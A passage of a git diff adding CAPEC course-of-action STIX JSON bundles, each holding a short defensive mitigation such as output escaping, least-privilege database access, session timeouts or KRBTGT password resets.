"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-79-0", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Refer to the RFCs to safely decode URL.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c6168e3d-14cd-4b0d-95c7-84c53e4b0899.json b/capec/course-of-action/course-of-action--c6168e3d-14cd-4b0d-95c7-84c53e4b0899.json new file mode 100644 index 0000000000..ab22417189 --- /dev/null +++ b/capec/course-of-action/course-of-action--c6168e3d-14cd-4b0d-95c7-84c53e4b0899.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--550ccf67-8fd8-4dff-bf27-1c296edb72ec", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c6168e3d-14cd-4b0d-95c7-84c53e4b0899", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-170-2", + "description": "Implementation: Customizing HTTP error codes such as 404 or 500.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c72f403d-00e2-4d78-a821-4b3af3113b2d.json b/capec/course-of-action/course-of-action--c72f403d-00e2-4d78-a821-4b3af3113b2d.json new file mode 100644 index 0000000000..9da4a67928 --- /dev/null +++ b/capec/course-of-action/course-of-action--c72f403d-00e2-4d78-a821-4b3af3113b2d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--458b3372-9f35-469a-8ade-c34ba9606779", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c72f403d-00e2-4d78-a821-4b3af3113b2d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-561-0", + "description": "Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow accounts to be a local administrator on more than one system.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c75dfa6d-afe9-465c-a6c3-f907a6000417.json b/capec/course-of-action/course-of-action--c75dfa6d-afe9-465c-a6c3-f907a6000417.json new file mode 100644 index 0000000000..43f27a38ea --- /dev/null +++ b/capec/course-of-action/course-of-action--c75dfa6d-afe9-465c-a6c3-f907a6000417.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--49f909c5-fd74-4ff5-a1b3-df851d6e2f3c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c75dfa6d-afe9-465c-a6c3-f907a6000417", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-65-0", + "description": "Design: Encrypt all communication between the client and server.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c82b2ed1-695e-478b-a652-8378b54533ea.json b/capec/course-of-action/course-of-action--c82b2ed1-695e-478b-a652-8378b54533ea.json new file mode 100644 index 0000000000..66b995e791 --- /dev/null +++ b/capec/course-of-action/course-of-action--c82b2ed1-695e-478b-a652-8378b54533ea.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4c231425-7797-478b-a90d-6e185998a453", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c82b2ed1-695e-478b-a652-8378b54533ea", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-93-3", + "description": "Use static analysis tools to identify log forging vulnerabilities.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--c9a6676d-85dc-4a5f-b64e-d1f3d2eb77de.json b/capec/course-of-action/course-of-action--c9a6676d-85dc-4a5f-b64e-d1f3d2eb77de.json new file mode 100644 index 0000000000..b6453f2ee2 --- /dev/null +++ b/capec/course-of-action/course-of-action--c9a6676d-85dc-4a5f-b64e-d1f3d2eb77de.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--fd4ce5bc-d08e-442b-8670-6abd5f4aa658", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--c9a6676d-85dc-4a5f-b64e-d1f3d2eb77de", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-110-2", + "description": "At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ca268462-f28e-48d9-b626-11c00a02a1eb.json b/capec/course-of-action/course-of-action--ca268462-f28e-48d9-b626-11c00a02a1eb.json new file mode 100644 index 0000000000..e1c89d0167 --- /dev/null +++ b/capec/course-of-action/course-of-action--ca268462-f28e-48d9-b626-11c00a02a1eb.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d758e786-0fb3-4b5e-b3eb-73e33bff6ea4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ca268462-f28e-48d9-b626-11c00a02a1eb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-111-3", + "description": "Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ca984166-6914-410d-bb5a-97d296f8a505.json b/capec/course-of-action/course-of-action--ca984166-6914-410d-bb5a-97d296f8a505.json new file mode 100644 index 0000000000..c36fb17e82 --- /dev/null +++ b/capec/course-of-action/course-of-action--ca984166-6914-410d-bb5a-97d296f8a505.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--c0a87ca3-21e7-4b0d-96a4-fd8ab4e6ff63", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ca984166-6914-410d-bb5a-97d296f8a505", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-207-2", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the client code.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--cc8cf389-f1d4-45b4-95a4-3b5659f8b063.json b/capec/course-of-action/course-of-action--cc8cf389-f1d4-45b4-95a4-3b5659f8b063.json new file mode 100644 index 0000000000..166b38a013 --- /dev/null +++ b/capec/course-of-action/course-of-action--cc8cf389-f1d4-45b4-95a4-3b5659f8b063.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--187db374-8a39-42c0-b44b-7c58a32430ab", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--cc8cf389-f1d4-45b4-95a4-3b5659f8b063", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2018-05-31T00:00:00.000Z", + "name": "coa-635-0", + "description": "Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--cd40e6b8-417e-4b69-83c9-03ac287cd752.json b/capec/course-of-action/course-of-action--cd40e6b8-417e-4b69-83c9-03ac287cd752.json new file mode 100644 index 0000000000..bb7671ba66 --- /dev/null +++ b/capec/course-of-action/course-of-action--cd40e6b8-417e-4b69-83c9-03ac287cd752.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0e3cc6d0-3d8d-47da-b2e3-75d00b100af5", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--cd40e6b8-417e-4b69-83c9-03ac287cd752", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-425-0", + "description": "\n An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.\n Avoid sharing unnecessary information during interactions beyond what is absolutely required for effective communication.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--cd4ba1a4-5044-4119-80cb-48678fa6e356.json b/capec/course-of-action/course-of-action--cd4ba1a4-5044-4119-80cb-48678fa6e356.json new file mode 100644 index 0000000000..e1576ee58d --- /dev/null +++ b/capec/course-of-action/course-of-action--cd4ba1a4-5044-4119-80cb-48678fa6e356.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--979d5776-2160-4e6e-8b78-0cff8b4dd9bb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--cd4ba1a4-5044-4119-80cb-48678fa6e356", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-182-4", + "description": "Implementation: use crossdomain.xml file to allow the application domain to load stuff or the SWF file called by other domain.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--cdc59f0e-dc48-4ca6-85c3-3cbe86191094.json b/capec/course-of-action/course-of-action--cdc59f0e-dc48-4ca6-85c3-3cbe86191094.json new file mode 100644 index 0000000000..b2fc704079 --- /dev/null +++ b/capec/course-of-action/course-of-action--cdc59f0e-dc48-4ca6-85c3-3cbe86191094.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4e08a6b4-c82e-44a9-bd54-a5aef33ee97c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--cdc59f0e-dc48-4ca6-85c3-3cbe86191094", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-68-1", + "description": "If an attacker cannot attack the scheme directly, he might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ce26c9be-0783-4a22-82ee-e24c4eb86e0c.json b/capec/course-of-action/course-of-action--ce26c9be-0783-4a22-82ee-e24c4eb86e0c.json new file mode 100644 index 0000000000..c83fb798ab --- /dev/null +++ b/capec/course-of-action/course-of-action--ce26c9be-0783-4a22-82ee-e24c4eb86e0c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--590eade8-8a13-4885-9d23-714e67c74db7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ce26c9be-0783-4a22-82ee-e24c4eb86e0c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-74-2", + "description": "Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--cea57129-2096-4707-a328-617470bd4c96.json b/capec/course-of-action/course-of-action--cea57129-2096-4707-a328-617470bd4c96.json new file mode 100644 index 0000000000..e6ee4597d6 --- /dev/null +++ b/capec/course-of-action/course-of-action--cea57129-2096-4707-a328-617470bd4c96.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--735dac63-70b2-44a9-ab72-502119d71046", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--cea57129-2096-4707-a328-617470bd4c96", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-648-1", + "description": "While screen capture is a legitimate and practical function, certain situations and context may require the disabling of this feature.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ceac777c-5bea-49d6-b3b9-a8655e5a41b0.json b/capec/course-of-action/course-of-action--ceac777c-5bea-49d6-b3b9-a8655e5a41b0.json new file mode 100644 index 0000000000..174022db0d --- /dev/null +++ b/capec/course-of-action/course-of-action--ceac777c-5bea-49d6-b3b9-a8655e5a41b0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--4d23408b-bfef-423c-b929-77147f25feb3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ceac777c-5bea-49d6-b3b9-a8655e5a41b0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-182-0", + "description": "Implementation: remove sensitive information such as user name and password in the SWF file.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--ceadbefb-d4f2-41fe-850d-4a0c2cf8bb9d.json b/capec/course-of-action/course-of-action--ceadbefb-d4f2-41fe-850d-4a0c2cf8bb9d.json new file mode 100644 index 0000000000..11c2877c68 --- /dev/null +++ b/capec/course-of-action/course-of-action--ceadbefb-d4f2-41fe-850d-4a0c2cf8bb9d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--099fb814-dfbc-40ee-b4f1-5c1ba12975e2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--ceadbefb-d4f2-41fe-850d-4a0c2cf8bb9d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-77-0", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--cf93531f-4e41-46e6-83f2-47dece8e630f.json b/capec/course-of-action/course-of-action--cf93531f-4e41-46e6-83f2-47dece8e630f.json new file mode 100644 index 0000000000..8426b044ab --- /dev/null +++ b/capec/course-of-action/course-of-action--cf93531f-4e41-46e6-83f2-47dece8e630f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7a7ffa60-52a8-4d5c-832f-1b5a06f46e39", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--cf93531f-4e41-46e6-83f2-47dece8e630f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-93-4", + "description": "Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d0446a84-cd0e-4210-8bac-469a0372c375.json b/capec/course-of-action/course-of-action--d0446a84-cd0e-4210-8bac-469a0372c375.json new file mode 100644 index 0000000000..74458cf134 --- /dev/null +++ b/capec/course-of-action/course-of-action--d0446a84-cd0e-4210-8bac-469a0372c375.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ae3459b5-53e8-427d-a452-365cdb9a4c85", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d0446a84-cd0e-4210-8bac-469a0372c375", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-18-1", + "description": "All output displayed to clients must be properly escaped. Escaping ensures that the browser interprets special scripting characters literally and not as script to be executed.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d04f33ca-24be-46f0-a6a6-06fc33de4b74.json b/capec/course-of-action/course-of-action--d04f33ca-24be-46f0-a6a6-06fc33de4b74.json new file mode 100644 index 0000000000..e5852ef543 --- /dev/null +++ b/capec/course-of-action/course-of-action--d04f33ca-24be-46f0-a6a6-06fc33de4b74.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--8b54f76f-e563-472c-8bd0-bf68805912c1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d04f33ca-24be-46f0-a6a6-06fc33de4b74", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-78-3", + "description": "Regular expressions can be used to filter out backslash. Make sure you decode before filtering and validating the untrusted input data.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d23ad838-17c7-483f-9c9e-409581bff898.json b/capec/course-of-action/course-of-action--d23ad838-17c7-483f-9c9e-409581bff898.json new file mode 100644 index 0000000000..35fdc99313 --- /dev/null +++ b/capec/course-of-action/course-of-action--d23ad838-17c7-483f-9c9e-409581bff898.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--bbe5867b-d164-41ff-b3cf-205f31cda04d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d23ad838-17c7-483f-9c9e-409581bff898", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-23-1", + "description": "Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d2561f0e-be8a-42c5-af7e-b0baaddc34c0.json b/capec/course-of-action/course-of-action--d2561f0e-be8a-42c5-af7e-b0baaddc34c0.json new file mode 100644 index 0000000000..3dd9535fbb --- /dev/null +++ b/capec/course-of-action/course-of-action--d2561f0e-be8a-42c5-af7e-b0baaddc34c0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--534032c0-50e9-4429-b7f3-7af01f49fbfd", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d2561f0e-be8a-42c5-af7e-b0baaddc34c0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-80-0", + "description": "The Unicode Consortium recognized multiple representations to be a problem and has revised the Unicode Standard to make multiple representations of the same code point with UTF-8 illegal. The UTF-8 Corrigendum lists the newly restricted UTF-8 range (See references). Many current applications may not have been revised to follow this rule. Verify that your application conform to the latest UTF-8 encoding specification. Pay extra attention to the filtering of illegal characters.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d2766301-f13d-4357-b351-decc874545f9.json b/capec/course-of-action/course-of-action--d2766301-f13d-4357-b351-decc874545f9.json new file mode 100644 index 0000000000..9bf78a1965 --- /dev/null +++ b/capec/course-of-action/course-of-action--d2766301-f13d-4357-b351-decc874545f9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7e4fd6c5-82a5-43d9-a65e-073bcd053290", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d2766301-f13d-4357-b351-decc874545f9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-456-0", + "description": "Leverage anti-virus products to detect stop operations with known virus.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d28c887c-36e8-4759-89f6-d459c8cc8847.json b/capec/course-of-action/course-of-action--d28c887c-36e8-4759-89f6-d459c8cc8847.json new file mode 100644 index 0000000000..30e45dd6e1 --- /dev/null +++ b/capec/course-of-action/course-of-action--d28c887c-36e8-4759-89f6-d459c8cc8847.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6faadfb4-1b5e-4a25-8e08-9f98aaa78767", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d28c887c-36e8-4759-89f6-d459c8cc8847", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-60-1", + "description": "Setup a session time out for the session IDs.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d2b5aa10-ee2b-4e45-ba0e-3ef17369b50f.json b/capec/course-of-action/course-of-action--d2b5aa10-ee2b-4e45-ba0e-3ef17369b50f.json new file mode 100644 index 0000000000..dabc233ed5 --- /dev/null +++ b/capec/course-of-action/course-of-action--d2b5aa10-ee2b-4e45-ba0e-3ef17369b50f.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--ea95b763-3d8b-4cee-b6e7-93f0d263a72a", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d2b5aa10-ee2b-4e45-ba0e-3ef17369b50f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-10-1", + "description": "Do not use untrusted data in your environment variables.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d2e2f760-3e91-480d-a010-51c7214317af.json b/capec/course-of-action/course-of-action--d2e2f760-3e91-480d-a010-51c7214317af.json new file mode 100644 index 0000000000..403c8ccfdd --- /dev/null +++ b/capec/course-of-action/course-of-action--d2e2f760-3e91-480d-a010-51c7214317af.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e43b69de-5e27-4658-ba9f-944f96e775dc", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d2e2f760-3e91-480d-a010-51c7214317af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-24-3", + "description": "Operational: Use OS-level preventative functionality. Not a complete solution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d32c1276-0d53-4aed-93c1-390329302d45.json b/capec/course-of-action/course-of-action--d32c1276-0d53-4aed-93c1-390329302d45.json new file mode 100644 index 0000000000..ed667d4051 --- /dev/null +++ b/capec/course-of-action/course-of-action--d32c1276-0d53-4aed-93c1-390329302d45.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0d0ce143-2889-41df-92f5-2956fa92e138", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d32c1276-0d53-4aed-93c1-390329302d45", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "coa-1-0", + "description": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d3a8826a-e076-4be8-b4ef-bdfab8c90e08.json b/capec/course-of-action/course-of-action--d3a8826a-e076-4be8-b4ef-bdfab8c90e08.json new file mode 100644 index 0000000000..78a230c3f5 --- /dev/null +++ b/capec/course-of-action/course-of-action--d3a8826a-e076-4be8-b4ef-bdfab8c90e08.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--3005f090-78a7-456e-9d91-7788aca90c2d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d3a8826a-e076-4be8-b4ef-bdfab8c90e08", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-598-1", + "description": "Design: Include \"hosts file\"/IP address in the application", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d3f0fa85-f178-41f3-8f8b-b572611e3396.json b/capec/course-of-action/course-of-action--d3f0fa85-f178-41f3-8f8b-b572611e3396.json new file mode 100644 index 0000000000..9394efd566 --- /dev/null +++ b/capec/course-of-action/course-of-action--d3f0fa85-f178-41f3-8f8b-b572611e3396.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--b0a7b55d-98c4-4ad6-924b-9e38bb85416b", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d3f0fa85-f178-41f3-8f8b-b572611e3396", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-31-2", + "description": "Implementation: Use SSL/TLS to protect cookie in transit", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d4088caf-df68-4407-9f28-93d5005a7f40.json b/capec/course-of-action/course-of-action--d4088caf-df68-4407-9f28-93d5005a7f40.json new file mode 100644 index 0000000000..47aebef8ab --- /dev/null +++ b/capec/course-of-action/course-of-action--d4088caf-df68-4407-9f28-93d5005a7f40.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--bb4e84a7-3ead-460f-ae2e-1cc08e0f8149", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--d4088caf-df68-4407-9f28-93d5005a7f40", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-645-0", + "description": "Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--d4db5596-3b70-4957-9170-a832e2cd0356.json 